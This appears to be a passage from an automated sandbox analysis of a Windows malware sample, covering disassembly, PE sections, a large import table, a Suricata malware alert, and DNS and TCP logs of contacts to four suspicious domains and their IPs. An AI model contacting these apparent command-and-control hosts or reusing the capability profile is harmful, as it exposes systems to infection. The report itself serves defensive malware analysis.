and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F8C950C43ADh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F8C950C43F8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F8C950C43E1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x59058	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12e000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x59058	0x59200	f9d475508e58dcf880971ef1dae31e1f	False	0.9257620748597476	data	7.890545364630552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12e000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x50320	data			1.000337920116902
RT_GROUP_ICON	0x12cad8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x12cb50	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x12cb64	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x12cb78	0x14	data	English	Great Britain	1.25
RT_VERSION	0x12cb8c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x12cc68	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T18:02:42.148028+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.143.155.63	80	192.168.2.6	49732	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:02:02.639763117 CET	49723	80	192.168.2.6	156.226.63.13
Jan 10, 2025 18:02:02.644654036 CET	80	49723	156.226.63.13	192.168.2.6
Jan 10, 2025 18:02:02.644794941 CET	49723	80	192.168.2.6	156.226.63.13
Jan 10, 2025 18:02:02.658382893 CET	49723	80	192.168.2.6	156.226.63.13
Jan 10, 2025 18:02:02.663209915 CET	80	49723	156.226.63.13	192.168.2.6
Jan 10, 2025 18:02:03.550158978 CET	80	49723	156.226.63.13	192.168.2.6
Jan 10, 2025 18:02:03.550677061 CET	80	49723	156.226.63.13	192.168.2.6
Jan 10, 2025 18:02:03.550750971 CET	49723	80	192.168.2.6	156.226.63.13
Jan 10, 2025 18:02:03.608020067 CET	49723	80	192.168.2.6	156.226.63.13
Jan 10, 2025 18:02:03.613384008 CET	80	49723	156.226.63.13	192.168.2.6
Jan 10, 2025 18:02:18.683500051 CET	49725	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:18.688317060 CET	80	49725	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:18.688446999 CET	49725	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:18.708327055 CET	49725	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:18.713558912 CET	80	49725	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:20.215536118 CET	49725	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:20.220525026 CET	80	49725	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:20.220694065 CET	49725	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:21.234750032 CET	49726	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:21.240076065 CET	80	49726	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:21.240173101 CET	49726	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:21.255484104 CET	49726	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:21.260337114 CET	80	49726	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:22.762769938 CET	49726	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:22.768480062 CET	80	49726	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:22.768594027 CET	49726	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:23.781512022 CET	49727	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:23.786405087 CET	80	49727	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:23.786497116 CET	49727	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:23.803492069 CET	49727	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:23.808270931 CET	80	49727	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:23.808335066 CET	80	49727	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:25.309515953 CET	49727	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:25.314636946 CET	80	49727	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:25.314769983 CET	49727	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:26.327894926 CET	49728	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:26.332953930 CET	80	49728	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:26.333125114 CET	49728	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:26.342181921 CET	49728	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:26.347443104 CET	80	49728	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:27.892240047 CET	80	49728	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:27.892318964 CET	80	49728	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:27.892431974 CET	49728	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:27.895184994 CET	49728	80	192.168.2.6	47.83.1.90
Jan 10, 2025 18:02:27.899930000 CET	80	49728	47.83.1.90	192.168.2.6
Jan 10, 2025 18:02:33.094383001 CET	49729	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:33.099766970 CET	80	49729	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:33.099903107 CET	49729	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:33.115906954 CET	49729	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:33.121426105 CET	80	49729	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:34.522062063 CET	80	49729	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:34.522084951 CET	80	49729	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:34.522160053 CET	49729	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:34.621922970 CET	49729	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:35.640785933 CET	49730	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:35.645667076 CET	80	49730	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:35.645766973 CET	49730	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:35.666156054 CET	49730	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:35.670900106 CET	80	49730	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:37.050658941 CET	80	49730	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:37.050678968 CET	80	49730	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:37.050759077 CET	49730	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:37.168647051 CET	49730	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:38.188522100 CET	49731	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:38.193716049 CET	80	49731	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:38.193831921 CET	49731	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:38.210139036 CET	49731	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:38.214941978 CET	80	49731	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:38.215027094 CET	80	49731	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:39.617923021 CET	80	49731	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:39.618001938 CET	80	49731	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:39.618150949 CET	49731	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:39.715661049 CET	49731	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:40.734628916 CET	49732	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:40.739676952 CET	80	49732	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:40.739772081 CET	49732	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:40.749044895 CET	49732	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:40.753917933 CET	80	49732	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:42.140291929 CET	80	49732	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:42.140336037 CET	80	49732	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:42.140531063 CET	49732	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:42.143177986 CET	49732	80	192.168.2.6	18.143.155.63
Jan 10, 2025 18:02:42.148027897 CET	80	49732	18.143.155.63	192.168.2.6
Jan 10, 2025 18:02:47.172352076 CET	49733	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:47.177170038 CET	80	49733	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:47.177270889 CET	49733	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:47.191977024 CET	49733	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:47.196819067 CET	80	49733	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:47.831195116 CET	80	49733	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:47.832294941 CET	80	49733	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:47.832382917 CET	49733	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:48.700104952 CET	49733	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:49.719677925 CET	49734	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:49.724510908 CET	80	49734	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:49.724981070 CET	49734	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:49.742393970 CET	49734	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:49.747198105 CET	80	49734	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:50.424998999 CET	80	49734	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:50.425173998 CET	80	49734	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:50.425434113 CET	49734	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:51.246865988 CET	49734	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:52.266001940 CET	49735	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:52.270816088 CET	80	49735	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:52.270914078 CET	49735	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:52.286041021 CET	49735	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:52.291846037 CET	80	49735	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:52.292027950 CET	80	49735	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:52.969345093 CET	80	49735	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:52.971463919 CET	80	49735	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:52.971544027 CET	49735	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:53.793661118 CET	49735	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:54.812216043 CET	49736	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:54.817451954 CET	80	49736	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:54.817569971 CET	49736	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:54.827641010 CET	49736	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:54.834084034 CET	80	49736	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:55.463665009 CET	80	49736	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:55.464903116 CET	80	49736	104.21.18.171	192.168.2.6
Jan 10, 2025 18:02:55.464983940 CET	49736	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:55.467103958 CET	49736	80	192.168.2.6	104.21.18.171
Jan 10, 2025 18:02:55.471872091 CET	80	49736	104.21.18.171	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 18:02:01.902470112 CET	61714	53	192.168.2.6	1.1.1.1
Jan 10, 2025 18:02:02.631288052 CET	53	61714	1.1.1.1	192.168.2.6
Jan 10, 2025 18:02:18.656677008 CET	53313	53	192.168.2.6	1.1.1.1
Jan 10, 2025 18:02:18.680850029 CET	53	53313	1.1.1.1	192.168.2.6
Jan 10, 2025 18:02:32.907692909 CET	64025	53	192.168.2.6	1.1.1.1
Jan 10, 2025 18:02:33.090935946 CET	53	64025	1.1.1.1	192.168.2.6
Jan 10, 2025 18:02:47.156569004 CET	62727	53	192.168.2.6	1.1.1.1
Jan 10, 2025 18:02:47.169842958 CET	53	62727	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 18:02:01.902470112 CET	192.168.2.6	1.1.1.1	0x4e9a	Standard query (0)	www.wuyyv4tq.top	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:02:18.656677008 CET	192.168.2.6	1.1.1.1	0xf338	Standard query (0)	www.cloijz.info	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:02:32.907692909 CET	192.168.2.6	1.1.1.1	0xa59b	Standard query (0)	www.xinchaocjcela.net	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:02:47.156569004 CET	192.168.2.6	1.1.1.1	0x9678	Standard query (0)	www.grimbo.boats	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 18:02:02.631288052 CET	1.1.1.1	192.168.2.6	0x4e9a	No error (0)	www.wuyyv4tq.top	156.226.63.13	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:02:18.680850029 CET	1.1.1.1	192.168.2.6	0xf338	No error (0)	www.cloijz.info	47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:02:33.090935946 CET	1.1.1.1	192.168.2.6	0xa59b	No error (0)	www.xinchaocjcela.net	18.143.155.63	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:02:47.169842958 CET	1.1.1.1	192.168.2.6	0x9678	No error (0)	www.grimbo.boats	104.21.18.171	A (IP address)	IN (0x0001)	false
Jan 10, 2025 18:02:47.169842958 CET	1.1.1.1	192.168.2.6	0x9678	No error (0)	www.grimbo.boats	172.67.182.198	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.wuyyv4tq.top

www.cloijz.info

www.xinchaocjcela.net

www.grimbo.boats

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
